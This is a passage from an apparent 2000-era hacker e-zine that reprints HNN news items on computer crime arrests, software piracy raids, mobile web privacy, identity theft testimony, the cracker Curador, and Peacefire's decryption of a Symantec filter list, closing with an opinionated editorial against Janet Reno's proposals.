      Railtrack at the beginning of the year. 

      The man was arrested on Friday but has to report back to police in 
      June pending further enquiries. 

      The alleged offences come under sections one and three of the Computer
      Misuse Act regarding unauthorised access and the modification of computer
      systems. He was arrested by officers from Scotland Yard's Computer Crime 
      Unit. 

      The identity of the man was not released. 

      Earlier this year The Register carried an exclusive interview with a 
      member of the group which claimed responsibility for hacking into the
      Lloyds of London Web site. 

      "MisterX", as he called himself, also claimed that credit card 
      transactions across the Internet were unsafe, and that he was able to 
      hoover-up confidential data from Web sites.  
      
      @HWA
      
144.0 HNN:Mar 9th:Cross Green Market Raided 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Apocalyse Dow 
      30 police officers and 19 industry investigators raided
      Cross Green Market in Leeds England and seized over
      500,000 of pirated software. The software included
      office applications, games and DVDs. Investigators from
      the European Leisure Software Publishers Association
      (ELSPA), Mechanical Copyright Protection Society
      (MCPS), Microsoft, Nintendo and Sony were involved in
      the raid. 

      Silicon.com - If Anyone has a better link please submit
      it. This lame site won't let you link directly to the story.       
      http://www.silicon.com/bin/bladerunner?REQUNIQ=952539836&30REQEVENT=&REQAUTH=21046
      
            
      @HWA
      
145.0 HNN:Mar 9th:AT+T Sends Private Info of Cell Surfers 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

      From HNN http://www.hackernews.com/
     
      Contributed by Simple Nomad 
      AT+T has confirmed that it sends the private phone
      number of its cell phone subscribers along with each
      web page request when those users are surfing via their
      cell phone. Yesterday HNN mentioned that SprintPCS did
      this as well; they have since said that they intend to
      change their policy of transmitting customers' phone
      numbers to Web sites. 

      San Francisco Chronicle       
      http://199.97.97.16/contWriter/cnd7/2000/03/08/cndin/0305-0002-pat_nytimes.html
      
      Hot Topics 
      Sprint to Hide Web Surfers' Phone Numbers 
      TODD WALLACK 
      c.2000 San Francisco Chronicle 


      After taking heat from privacy advocates, Sprint PCS said Tuesday it plans 
      to change its policy of transmitting customers' phone numbers to Web sites 
      they access with their cell phones. 

      But a second company, AT&T, confirmed that it, too, automatically sends 
      customers' phone numbers to Web sites through its wireless data service. 
      The phone numbers are embedded in every request for a Web page. 

      Privacy watchdogs complained the practice makes it too easy for Web sites 
      to forward the phone numbers to their sales department for follow-up 
      calls. Moreover, Web site operators could potentially use databases to 
      match the phone numbers with users' real names and other personal 
      information. 

      At least one analyst said the practice could hurt AT&T's and Sprint's 
      fledgling efforts to persuade customers to use their cell phone services 
      to access the Web. 

      ``Personal privacy is paramount,'' said Ken Dulaney, a San Jose analyst 
      with the Gartner Group. ``If that isn't one of the first concerns of any 
      business, it is likely the business is not going to do well in the long 
      run.'' 

      Only about 50,000 people in the United States now use cell phones to 
      access the Web, Dulaney said, but experts expect millions to do so in 
      coming years, making it an important market. 

      Sprint said it will let customers decide whether to give out their phone 
      number in the next version of its wireless Web service, scheduled to be 
      rolled out in April or May. If users don't make a choice, Sprint will 
      automatically send Web sites a ``bogus number'' as their user ID. 

      Sprint, though, denied it was making the change because of complaints by 
      consumers and privacy advocates. A Sprint executive said the new product 
      has been in the works for more than a year. 

      ``We have always been focused on customers' privacy,'' said Keith 
      Paglusch, PCS senior vice president for operations. 

      Paglusch said he didn't realize any customers were upset about the current 
      practice until The Chronicle published a story about the issue in 
      Tuesday's paper. 

      He said it was ``a nonissue'' in focus groups. And a Sprint spokesman 
      pointed out that it has agreements with a dozen partners featured on the 
      cell phone screen that bar them from using the phone number for 
      telemarketing or other purposes. 

      AT&T spokesman Ken Woo also brushed aside privacy worries. Woo said the
      phone company hasn't received any gripes from customers about the practice,
      which it first publicly disclosed Tuesday. Woo also declined to say whether
      the company is considering changing the policy. 

      ----- 

      (The San Francisco Chronicle Web site is at http://www.sfgate.com) 
      
      
      Addendum:
      
      Cell Phone Surfers Web Privacy 


      contributed by Space Rogue 
      Yesterday HNN linked to a story in the San Francisco
      Chronicle that blamed AT+T for sending subscribers' cell
      phone numbers along with web requests when users
      surfed with their phones. We received an email,
      apparently from an AT+T technician, refuting that
      article. He said "Our (AT+T) web-accessible phones do
      not use the cellular network at all to surf the web. Our
      phones use CDPD--an IP-based protocol having nothing
      to do with cellular. Each IP is a real Internet routable IP
      that is assigned the same as any CDPD
      modem--orthogonal to the cellular phone provisioning.
      Many current PocketNet phones don't even have voice
      service (data only) so they can't even send a MIN!" 
      
      @HWA

      
146.0 HNN:Mar 10th: MIT Blames Cyber Vandals For Sorting Error 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Dave Sjerven 
      When a computerized grading system failed to report
      the proper grades for a cell biology class at the
      Massachusetts Institute of Technology, officials
      immediately concluded that it must have been the work
      of electronic intruders. After a thorough investigation
      MIT discovered that in fact the changed grades were
      due to a spreadsheet sorting error. (The simplest
      answer is usually the correct one.) 

      MIT
      http://web.mit.edu/newsoffice/nr/2000/grades.html
      
      ComputerWorld
      http://www.computerworld.com/home/print.nsf/all/000309F556
      
      Boston Herald
      http://www.bostonherald.com/bostonherald/lonw/error03092000.htm
      
      Boston Globe (It was on the front page of the Globe
      yesterday, today it made it to B3) 
      http://www.boston.com/dailyglobe2/070/metro/MIT_grade_changes_tied_to_teaching_assistant_s_error+.shtml
      
      MIT
      
      
      Grade changes at MIT caused by slip-up
      in spreadsheet sorting of names and grades
      MARCH 9, 2000

      An incident of grade-changing on an MIT computer -- investigated as a
      computer hacking incident -- has turned out to be a simple slip-up in
      the computerized sorting of names and grades on a spreadsheet.

      Professor Harvey Lodish this morning informed an MIT spokesman that the 
      mystery was solved. He said the changes were made by mistake by a person
      authorized to enter grades. The professor declined to identify the person.

      The sorting of a grades spreadsheet is done by using a computer mouse to
      highlight the two columns of names and corresponding grades. In this case,
      there was a slip-up in the use of the mouse and only the column of names 
      was sorted, resulting in grades being assigned to the wrong people. The 
      error raised the grades of two students and lowered the grades of 20 students.
      
      -=-
      
      Nuff'said on this one.. - Ed ROFL
      
      @HWA
      
147.0 HNN:Mar 10th:NY Wants Privacy for Consumers 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Evil Wench 
      The New York State Senate on Wednesday unveiled a
      package of new legislation to protect the privacy of
      consumers, drivers, and patients that would place new
      restrictions on credit agencies, schools, telemarketers,
      hospitals, pharmacies, and other organizations that
      gather and use personal information. "Our
      recommendations were guided by a belief that
      individuals have a basic right to know who is collecting
      personal information, how it is being used and whether
      that information is shared or sold without their
      knowledge or approval," said Senate Majority Leader
      Joseph Bruno. (Damn. Makes me want to move to New
      York just so I can vote for this guy.) 

      Reuters - via TechWeb
      http://www.techweb.com/wire/story/reuters/REU20000308S0010      
      
      NY Senate Seeks Internet Privacy
      Laws
      (03/08/00, 6:05 p.m. ET)
      By Reuters 

      NEW YORK (Reuters) -- The New York State
      Senate, addressing a growing controversy
      about how Internet companies gather and use
      information about customers, Wednesday
      unveiled a package of new legislation to
      protect the privacy of consumers, drivers, and
      patients. 

      The proposals came after online advertising company
      DoubleClick made headlines last week, backing down on
      a plan to identify anonymous Web surfers. Privacy
      advocates have fiercely objected to plans under which
      companies collect and share information that identifies
      individuals, as opposed to data on demographic groups. 

      But the senate did not limit its reach to just Internet data.
      The legislation also contains new restrictions on credit
      agencies, schools, telemarketers, hospitals, pharmacies,
      and other organizations that gather and use personal
      information. 

      The legislation would also protect people who use
      financial services, including those offered by major banks
      headquartered in New York City. 

      One proposal would bar businesses, schools, and other
      outfits from sharing or selling Social Security numbers.
      What the senate called surreptitious video surveillance in
      a private dwelling without consent would also become a
      new crime. 

      "Our recommendations were guided by a belief that
      individuals have a basic right to know who is collecting
      personal information, how it is being used and whether
      that information is shared or sold without their knowledge
      or approval," Senate Majority Leader Joseph Bruno (R),
      said in prepared remarks. 

      Identity theft is one of the fastest-growing crimes in the
      nation, claiming about 400,000 victims a year, the senate
      said in written remarks. To combat this type of crime, the
      senate said it would advance legislation making it a crime
      to knowingly obtain personal information with the intent
      to use the data to get goods or services in another
      person's name. 

      Patients' privacy also would be protected: pharmacies,
      hospitals and other health care providers would be barred
      from sharing or selling what the senate called personally
      identifying medical or health data for any purpose not
      directly related to the person's treatment. 

      The only exception would be for federal or state
      reporting requirements. 

      The senate also would apply stiff rules for telemarketers,
      barring them from accessing customers' checking,
      savings, and other accounts without approval. 

      The sale of drivers' Motor Vehicle registration and title
      information also would be prohibited. 

      And prisoners, some of whom do contract work on
      computers, would be prohibited from tapping into
      personal information. 

      In addition, schools and colleges would only be able to
      use their students' Social Security numbers for
      identification. 

      The senate also would apply new laws to credit agencies,
      banning them from selling consumers' credit card
      numbers for unauthorized purposes. It estimated the
      three largest agencies have records on 160 million
      individuals, including birth dates, addresses, phone
      numbers, Social Security numbers, job and salary history,
      credit transactions, and more. 

      While the federal Fair Credit and Reporting Act puts
      limits on an agency's ability to share or sell information in
      people's credit reports, the credit agencies often get
      around that by selling basic data, such as Social Security
      number, age, phone and address, the senate said. 

      A senate task force studied the privacy issue for about a
      year, and the Republican-led body next week expects to
      start approving its new legislation. Not to be outdone, the
      Democrat-controlled Assembly said it would hold two
      hearings in March on consumer privacy. 

      Saluting Chase Manhattan for no longer giving outside
      marketers their customers' personal and financial
      information without consent, the senate called on all
      financial institutions to follow the same standard. 
      
      @HWA
      
148.0 HNN:Mar 10th:Curador Taunts Police 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by William Knowles 
      "Law enforcement couldn't hack their way out of a wet
      paper bag. They're people who get paid to do nothing.
      They never actually catch anybody," said Curador to an
      Internet News reporter. Curador has made a practice of
      breaking into e-commerce sites, grabbing their customer
      database and then posting the numbers online. So far
      he claims to have gotten into eight systems and has
      posted thousands of valid numbers to his web site. His
      previous web sites at e-crackerce.com and
      free-creditcard.com, which themselves were registered
      with fraudulent cards, have been shut down. Curador
      has said that he will publicize his newest site with a
      banner on the Microsoft Banner Network. Curador's first
      cyber break in occurred back in January. 

      Internet News 
      http://www.internetnews.com/ec-news/article/0,1087,4_318381,00.html
      
      E-Commerce News 

      Curador Taunts Police Over Site Break-Ins
      March 9, 2000
      By Brian McWilliams, InternetNews.com Correspondent


      Curador, the cracker who has stolen credit cards from at least eight small 
      e-commerce sites and then posted them online, is growing more brazen by 
      the minute. 

      In an interview with InternetNews Wednesday, Curador claimed he has hit 
      five new Web firms and will soon publish hundreds more stolen credit card 
      numbers at a new site, which he said he registered using one of the stolen 
      cards. 

      "Law enforcement couldn't hack their way out of a wet paper bag. They're 
      people who get paid to do nothing. They never actually catch anybody," 
      said Curador. 

      After hitting his first site, Shopping Thailand, on Jan. 31, Curador has 
      so far eluded arrest. In February, Curador stole and posted credit cards 
      from mobile phone provider ProMobility, LTAmedia, a self-improvement 
      products site, and the homepage of the American Society of Clinical 
      Pathologists. Curador's most recent victims include NTD, a Web development 
      firm in the U.K., Vision Computers, a computer retailer, as well as Sales 
      Gate, an ecommerce portal, and online herbalist Feelgood Falls. 

      Using a stolen card, Curador set up a site at e-crackerce.com in late 
      February where he posted several thousand of the purloined card numbers. 
      That site was soon shut down by the hosting company. A few days ago, 
      Curador re-emerged at free-creditcard.com, also apparently registered 
      using one of his victim's credit cards. That site has also been disabled. 

      To publicize his latest site, Curador said he has created an animated ad 
      banner and signed up for the Microsoft Banner Network, which will display 
      Curador's banner at participating Web sites. 

      "The banner says, 'Find out exactly what you can do if you have Microsoft 
      IIS Web server and ecommerce.' And if you click on it it'll take you right 
      to my site," said Curador. 

      Curador has admitted to targeting Windows NT systems in his previous 
      break-ins, using a known vulnerability in a feature called RDS, which was 
      first publicized by a security consultant who goes by the hacker nickname 
      of Rain Forest Puppy. But Curador now says he's turned his attention to 
      Unix servers, and claims to have captured encrypted password files that he 
      is attempting to crack. 

      "Unix is harder, but I want some more interesting targets. It's too easy 
      to do Windows and I can't be bothered any more." 

      Chris Davis, a security expert with Tyger Team Consultants in Ottawa, 
      Ontario, which has been retained by several of Curador's victim sites, 
      said the cracker's decision to target UNIX machines will make him easier 
      to track down. 

      "I'm laughing all the way to the court house, because Unix logs much 
      better than NT. Any time he sends a packet to a Unix machine it's going to 
      be logged somewhere, and that's going to make our job easier," said Davis. 

      Claiming to be a Webmaster for an ecommerce company, Curador has said his 
      goal is to wake up sites about their security vulnerabilities. But when 
      asked Wednesday whether he feels any remorse toward the people whose cards 
      he has stolen, Curador was unapologetic. 

      "It's just their tough luck. It's not my fault that the site (was 
      insecure). If I didn't do it, somebody else would have and not advertised 
      it," said Curador. 

      Davis admitted law enforcement agencies have been frustratingly slow in 
      investigating the case, but he is confident that Curador's crime spree 
      will soon come to an end. 

      "He's not as bright as he thinks he is. I could be underestimating him, 
      but I really doubt it. In a combined effort, we are far better at what we 
      do than this guy is, and I can't wait to see the look on this guy's face 
      when he gets arrested." 

      @HWA
      
149.0 HNN:Mar 10th:DDoS Attacks Used As Reason for National Court Order 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Evil Wench 
      Using the example of the recent distributed denial of
      service attacks, law enforcement representatives have
      been asking Congress for a national court order.
      Currently law enforcement must seek a separate court
      order in each state they track a single piece of data to
      get to its source. 

      TechWeb       
      http://www.techweb.com/wire/story/TWB20000308S0009
      
      Law Enforcers May Hunt Hackers
      With Federal Powers
      (03/08/00, 5:26 p.m. ET) By Mary Mosquera, TechWeb 

      WASHINGTON, D.C.-- The Clinton
      administration is thinking about letting law
      enforcement get national court orders to trace
      electronic communications to help hunt down
      hackers and other cyber criminals, a senior
      Justice Department official told lawmakers
      Wednesday. 

      "Obtaining court orders in multiple jurisdictions does not
      advance any reasonable privacy safeguard, yet it can be
      a substantial impediment to a fast-paced investigation,"
      said Deputy U.S. Attorney General Eric Holder. But it
      might be extremely helpful to provide a nationwide effect
      for trap and trace orders, he told the Senate Commerce
      committee looking at recent cyber attacks. 

      Any changes to existing law will be sensitive to privacy,
      which is spelled out in the Fourth Amendment and
      federal statutes, he told senators. 

      Sen. Ron Wyden (D-Ore.) said he was concerned about
      encroachment on citizens' privacy with expanded
      powers, adding "I worry that the cure could be worse
      than the ailment." 

      Investigators are subject to laws made for offline crime
      in tracking. An example is the case of the hackers
      responsible for the distributed denial-of-service attacks
      that temporarily halted popular Internet sites last month.
      Law enforcement must seek a separate court order in
      each state they track a single piece of data to get to its
      source. 

      "We are making progress in the investigation," Holder
      said of the denial-of-service crimes, but it is slow going. 

      Industry must lead to promote security, and government
      must make its own networks a model of security, but law
      enforcement also must be fully funded to acquire the
      technical expertise and staff, said Michael Vatis, director
      of the FBI's National Infrastructure Protection Center. 

      And while there are companies that prefer not to report a
      crime because of fear of public embarrassment due to a
      security lapse, the situation has improved, he said.
      "Companies increasingly realize that deterrence of crime
      depends on effective law enforcement, and the long-term
      interests of industry depend on establishing a good
      working relationship with government to prevent and
      investigate crime," Vatis said. 

      One initiative, InfraGard, has industry inform local FBI
      about intrusions using secure e-mail in both a sanitized
      and detailed format, the more descriptive one for the
      investigation and the more anonymous version for sharing
      about system vulnerabilities, he said. 

      The Internet has changed how communications are
      transmitted and magnified the problem of gathering
      evidence, Martha Stansell-Gamm, chief of the computer
      crime section at Justice, told reporters outside the
      hearing. "It's not an enhancement of our legal powers so
      much as sort of a return to status quo," she said. 

      "In the old days, there used to be one phone company, so
      if you got an order to trace a communication, all the
      information was contained by that entity, Ma Bell. It
      didn't matter if it were a local phone call or a national
      phone call from coast to coast. Now, one communication
      that we identify can be carried at the same time by many
      different phone companies, local and long distance,
      several different Internet service providers, and a cell
      phone provider or two," she said. 

      If a communication is carried by a number of carriers,
      one order can elicit only limited information. "But we
      have to get another order in the district where another
      company is located, and this is for the same
      communication," Stansell-Gamm said. 

      Other possible changes to laws covering computer crime
      may be an increase in the penalty and lowering the
      threshold at which damage is caused. 
      
      @HWA
      
150.0 HNN:Mar 10th:Voluntary Compliance With Security Practices Recommended 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Anonymous 
      Raj Reddy, co-chairman of the President's Information
      Technology Advisory Committee said while testifying
      before Congress that "Rather than leaving the Internet
      vulnerable because a few persons or organizations are
      careless or reckless, we should develop an information
      infrastructure that is not dependent on voluntary
      compliance with security practices and policies."
      (Voluntary compliance? Yeah, that gives me the warm
      fuzzies.) 

      Federal Computer Week       
      http://www.fcw.com/fcw/articles/2000/0306/web-3survive-03-09-00.asp
      
      

      A strong Internet is a secure Internet 

      BY Diane Frank 
      03/09/2000 

      The best way to secure the Internet is to make the Internet itself stronger, a
      member of the President's Information Technology Advisory Committee testified
      Wednesday before Congress. 

      Many security problems faced by agencies and industry stem from administrators not
      paying close enough attention to their systems, Raj Reddy, co-chairman of the
      PITAC and a computer science professor at Carnegie Mellon University, testified
      before the Senate Commerce, Science and Transportation Committee's
      Communications Subcommittee. 

      "Rather than leaving the Internet vulnerable because a few persons or organizations
      are careless or reckless, we should develop an information infrastructure that is not
      dependent on voluntary compliance with security practices and policies," Reddy
      said, suggesting the creation of a "self-healing" network. 

      The concept of survivability -- ensuring that services are available when needed and
      that information is delivered in a timely fashion -- runs through many of the funding
      recommendations in the PITAC's February 1999 report to the president, "Information
      Technology Research: Investing in Our Future." The PITAC is reviewing federal
      research plans and will issue new recommendations later this year. 

      In making the Internet more reliable, a self-healing network would provide security
      by catching problems as they happen, he said. 

      "A self-healing network would work similar to the human immune system," Reddy
      said. "It would constantly monitor the system, analyze what is in the system, and if
      it finds something wrong within the system, immediately begin actions to remedy the
      problem." 

      To develop the technology behind a more dependable Internet, Reddy urged the
      federal government to fund a national network test bed. Such an arrangement would
      be similar to the partnership created by several federal agencies and universities to
      develop and test the high-speed Next Generation Internet. 
      
      @HWA
      
151.0 HNN:Mar 10th:Chinese Gangs Blamed For Identity Theft 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Evil Wench 
      In testimony before the Senate Judiciary Subcommittee
      on Technology, Terrorism and Government, US Secret
      Service Special Agent Gregory Regan explained that
      organized Chinese fraud rings in the US and overseas
      are more and more likely to break into electronic
      databases to compromise credit and identity details. In
      1999 there were 1,147 cases of identity theft resulting
      in 644 convictions. 

      The UK Register      
      http://www.theregister.co.uk/000308-000016.html
      
      Posted 08/03/2000 2:20pm by Thomas C. Greene in Washington

      Chinese hackers turn to identity theft
      
      Organised Chinese fraud rings on the mainland and overseas are more likely to 
      hack databases to compromise credit and identity details than ply the more 
      traditional avenues of bribing bank employees favoured by their Nigerian 
      counterparts, a federal investigator claims. 
      
      "The Chinese gangs have moved into the electronic age where they're using 
      hacking techniques and Internet theft," US Secret Service Special Agent Gregory 
      Regan explained in testimony before the Senate Judiciary Subcommittee on 
      Technology, Terrorism and Government Information Tuesday. 
      
      Identity theft is an increasingly easy scam now that so much information is 
      available on line, Regan warned. "The Internet makes it unnecessary for 
      criminals to obtain identity documents," he said. 
      
      The Net is creating a "faceless society" where it's easy for an identity 
      fraudster, even one overseas, to open a credit account on line, sometimes with 
      nothing but his victim's name and social security number, Regan observed. 
      
      There were 1,147 cases of identity theft resulting in 644 convictions reported 
      in the US during 1999 alone. The US Social Security Administration reports that 
      over 81 percent of social security number misuse involves ID theft. Most 
      incidents are part of some larger, organised criminal enterprise. 
      
      Committee Chairman Jon Kyl (Republican, Arizona) sponsored the Identity Theft 
      and Assumption Deterrence Act, which became law in 1998. He convened Tuesday's 
      hearing to review the act's success and seek suggestions for its improvement. 
      
      The act requires the Federal Trade Commission to assist ID theft victims, which 
      it now does, in part, via a Web page here. 
      
      In spite of recent efforts to address the problem, victims often find that 
      recovering their identity is immensely more difficult than losing it. Witness 
      Maureen Mitchell recalled a seemingly endless series of difficulties in sorting 
      out her records after being victimised by fraudsters who ran up US $110,000 in 
      bogus charges in her and her husband's name. 
      
      Her suggestion for amending the bill would require merchants and credit agencies 
      to develop a single, unified protocol for victim notification. 
      
      "We had to submit handwriting samples to twenty different merchants; we had to 
      submit notarised documents and affidavits. It's like filling out your tax return 
      twenty times with twenty different sets of instructions," she observed dryly. 
      
      Having considerable personal experience with filling out American tax returns, 
      we can say without hesitation that the victim is being punished quite severely 
      here, and can only offer our hope that the criminals might suffer half as much. 
      
      @HWA
      
152.0 HNN:Mar 10th: U.S. Urges Internet Businesses to Help Fight Crime 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Turtlex 
      A report released by a working group led by Attorney
      General Janet Reno has said that Internet businesses
      need to cooperate with law enforcement to fight online
      crime. The 60-page report recommended more resources
      and training for law enforcement, urged greater
      promotion of cyber ethics and concluded that the
      existing laws should be adequate to protect against
      most online crimes. 

      Reuters - Yahoo
      http://dailynews.yahoo.com/h/nm/20000309/pl/tech_crime_1.html
      
      USA Today       
      http://www.usatoday.com/life/cyber/tech/cth524.htm
      
      Reuters'
      
      Thursday March 9 1:34 PM ET 

      U.S. Urges Internet Businesses to Help Fight Crime

      By James Vicini

      WASHINGTON (Reuters) - The Clinton administration said on Thursday that 
      Internet businesses, many of which have long been suspicious of government 
      regulation, need to cooperate with law enforcement to fight online crime.

      ``We are not asking businesses to be online cops. But we want them to be 
      online neighborhood watch groups,'' Commerce Secretary William Daley said 
      at a Justice Department news conference in releasing a report on unlawful       
      Internet conduct.

      The 60-page report recommended more resources and training for law 
      enforcement, urged greater promotion of cyberethics and concluded the 
      existing laws should be adequate to protect against most unlawful online 
      activities.

      The report by a working group led by Attorney General Janet Reno was 
      requested by President Clinton in August last year. The report was 
      essentially completed before last month's attacks that shut down some of 
      the Web's most popular sites.

      The FBI has been investigating the attacks, but has yet to make any 
      arrests or bring any charges in what officials admit could be a lengthy 
      investigation.

      Daley said government and industry worked together on the Y2K problem. ``I 
      think if companies can help nail hackers who threaten our networks, it's 
      not just good for fighting crime, it's good for the future of 
      e-commerce,'' he said.

      Businesses ``can do for the Internet what neighbors do for each other 
      across the country, making communities safer by keeping an eye on each 
      other. I think they should share their experiences and technologies with 
      law enforcement,'' he said.

      ``Businesses must step up their own efforts to make the Internet more 
      secure and not wait for cybercops to be expanded,'' Daley said.

      Reno acknowledged that some industry representatives had been concerned 
      about government regulation, but said the distrust was beginning to 
      vanish.

      ``I think there are still some -- perhaps it's a little like the wild West 
      in the development of America -- who say, 'Let not let government be 
      involved.' But there was also the marshals and Wyatt Earp and others who 
      brought some order to it,'' she said.

      A leading civil liberties group said the report raised privacy concerns 
      and warned that it could result in expanded police powers.

      The American Civil Liberties Union said in a letter to Reno that the 
      report contained virtually no statistics on the extent of computer-related 
      crime or whether such activity posed a truly significant threat to the 
      nation.

      The ACLU objected to the report's description of anonymity of Internet 
      users as a ``thorny issue.'' The ACLU said, ``An end to Internet anonymity 
      would chill free expression in cyberspace and strip away one of the key 
      structural privacy protections enjoyed by Internet users.''

      -=-
      
      USA Today;
      
      http://www.usatoday.com/life/cyber/tech/cth524.htm
      
      Cybercrime report controversial
      
      By M.J. Zuckerman and Kevin Johnson, USA TODAY 
      
      WASHINGTON -- Attorney General Janet Reno will release a report
      Thursday that seeks to expand the powers of law enforcement to conduct
      investigations in cyberspace. The report is already stirring controversy. 
      
      The report is the product of a presidential working group that was appointed
      last summer. It amounts to a legislative wish list from law enforcement
      agencies that claim to be stymied by abuses involving new technology.
      
      "They make the assertion that there is all this illegal conduct on the Internet
      that they must investigate, but nowhere in the report do they show any
      numbers or proof," says Emily Whitfield of the American Civil Liberties
      Union, which asked Reno in a letter to reject the report's conclusions.
      
      A draft of the report was released last week. It drew criticism from the civil
      liberties community as well as many in the Internet community.
      
      The 59-page draft report wants to loosen restrictions on several technical,
      legal procedures that would make it easier to identify and track individual
      Internet users. 
      
      "The report treats anonymity of Internet users as a 'thorny issue,' rather than
      a constitutional right," established in a Supreme Court case in 1995 that says
      the Constitution grants citizens the right to speak anonymously, the ACLU
      letter says. 
      
      @HWA
      
153.0 HNN:Mar 10th:Symantec Wants List Removed 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by knobdicker 
      Symantec is pressing the ISP that hosts the Peacefire
      anti-censorware organization to remove content linking
      to a decrypted list of the thousands of sites blocked by
      I-Gear, Symantec's Internet-filtering software.
      Symantec claims that posting the decrypting software
      and site information is a EULA violation, which raises
      legal issues about software reverse engineering similar
      to the MPAA lawsuit over DVD DeCSS. (Symantec
      should be thankful for all the free testing instead of
      trying to quash what they see as bad press.) 

      Wired
      http://www.wired.com/news/technology/0,1282,34842,00.html
      
      Peacefire       
      http://www.peacefire.com
      
      Censorware Exposed Again 
      by Chris Oakes 
      
      3:00 a.m. 9.Mar.2000 PST If you buy software to filter smut from the eyes 
      of Web-savvy children, you might expect it to catch a few innocent sites 
      in its electronic net. 

      But you may be surprised if over half of those sites being blocked are on 
      the list for no good reason. 

      That's what anti-"censorware" organization Peacefire says it proved when 
      it decrypted a list of the thousands of sites blocked by I-Gear, 
      Internet-filtering software from software firm Symantec. 

      "It shows how far people are willing to go in censoring people under 18 
      without applying critical examination of the tools," said Bennett 
      Haselton, 21, who founded Peacefire in 1996 to promote "free access for 
      the Net generation." 

      Since then, Peacefire has frequently made a point of poking holes in the 
      strategy of filtering Net content from youthful eyes in homes, libraries, 
      and schools. 

      "If [Symantec] hadn't taken time to pay an intern $10 for an hour's time 
      to do what I did, it means they didn't care enough to take the time to 
      improve their product," Haselton said. 

      What Haselton did was develop a software utility that could decrypt the 
      list of Web addresses blocked by I-Gear. Using the software himself, 
      Haselton examined the first 50 addresses blocked in the category of sites 
      ending in the .edu domain.

      Ostensibly blocked by I-Gear under "pornography," Haselton said the 
      majority of the blocked sites didn't begin to fit the description. 

      Symantec said that posting the decrypting software and site information 
      violates the end-user license agreement that comes with its software. The 
      company has asked the ISP that hosts Peacefire's Web pages to remove the 
      link to the Symantec information.

      That argument, if it went to court, could face the same legal questions of 
      "reverse engineering" coming into play in lawsuits over a utility that 
      enables allegedly illegal playback of DVD discs on Linux computers. 

      An overall analysis of the blocked sites produced a 76 percent error rate 
      for I-Gear, Haselton said. 

      These sites included a student site showing an experiment in which the 
      face of model Cindy Crawford morphed into the face of Claudia Schiffer, 
      and parts four and six of an academic analysis of the decline and fall of 
      the Roman Empire. Another blocked page included a lengthy text
      written entirely in Latin. 

      Peacefire deemed such sites "obvious errors," but also included in its 
      evaluation "marginal errors." Such sites included a satirical look at 
      growing up, entitled "How To Get By When You're Just As Dumb As Everyone 
      Else, But Uglier." The site contained "some profanity," Peacefire
      said, but was not "pornographic" as categorized by I-Gear. 

      
      Symantec Vice President Arthur Courville said Peacefire is acting 
      illegally. 

      "It was making part of our software available to the public in a manner 
      that it was not supposed to be made available," and that violates the 
      company's trade secrets and copyrights, said Courville, who also is 
      Symantec's general counsel.

      Neither Peacefire nor its ISP has acted on Symantec's request. Courville 
      wouldn't say whether the company planned to pursue the matter further. 

      In 1997, another filtering software company, Solid Oak, threatened legal 
      action against Peacefire for similar actions against its CyberSitter 
      software, but never followed up on the threat. 

      As for the allegedly error-ridden list exposed by Peacefire's actions, 
      Symantec said what should and shouldn't be included in a list is often a 
      matter of opinion. 

      "The I-Gear product is infinitely configurable, so the user can set that 
      to exclude everything on filter list[s], use portions, add or subtract 
      individual sites," Courville said. "So it's really up to the end user. 

      "Whenever dealing with a subject that covers as wide range of what we're 
      talking about here, there are areas that people are going to have 
      different opinions about." 

      The product has approximately two dozen subject categories, he said, 
      including crime, drugs, finance, sex, and nudity. 

      Liza Kessler, staff counsel at the Center for Democracy & Technology, said 
      that if its work is valid, Peacefire has once again proven the risk 
      parents and administrators take when they rely on software to monitor 
      their children's Internet use.

      "If consumers want this stuff they need to be able to make informed 
      choices about what they're getting," Kessler said. "If these companies are 
      not being truthful and someone exposes underlying truths of what is being 
      censored, that provides a lot of additional information to
      consumers." 

      It's not realistic for a company to expect the end user to review every 
      site for relevance to a blocking category, Kessler said. 

      Courville admitted that mistakes are "possible," as the list is processed 
      in a combination of human and automatic review. 

      As for the blocked Latin page, Courville speculated that the software's 
      language-translation capabilities may have found something in the Latin 
      text that qualified it under the pornographic categorization. 

      Haselton guessed that something may have been the high frequency of the 
      Latin word "cum." 
      
      @HWA
      
154.0 Janet Reno and her commie crusade into a police state...
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Here's the latest offal to be spewed from Janet's new proposal
      
      <SNIP>      
      
      Constitutional protections of the press are getting in the way of
      computer investigations, and need to be eliminated, says Janet Reno.
      The Privacy Protection Act of 1980 protects American journalists,
      scholars and writers by prohibiting all law enforcement agencies from
      searching for or seizing "any work product materials" or any related
      "documentary materials....possessed by a person....with a purpose to
      disseminate to the public a newspaper, book, broadcast, or other
      similar form of public communication."
      
      <SNIP>
      
      Snarfed from Packetstorm, who wisely had this on their main page. It's
      important news, people! She wants essentially to (for example) have
      access to all my data, probably wants a camera in my john too.
      
      I don't live in the U.S. and I'm glad, since it's turning more communist
      every day, especially if we let people like Reno get their way.
      
      Fight back... there's plenty of causes to pick up 'arms' against, here
      is yet another attack on our privacy and freedom. - Ed
      
      @HWA
      
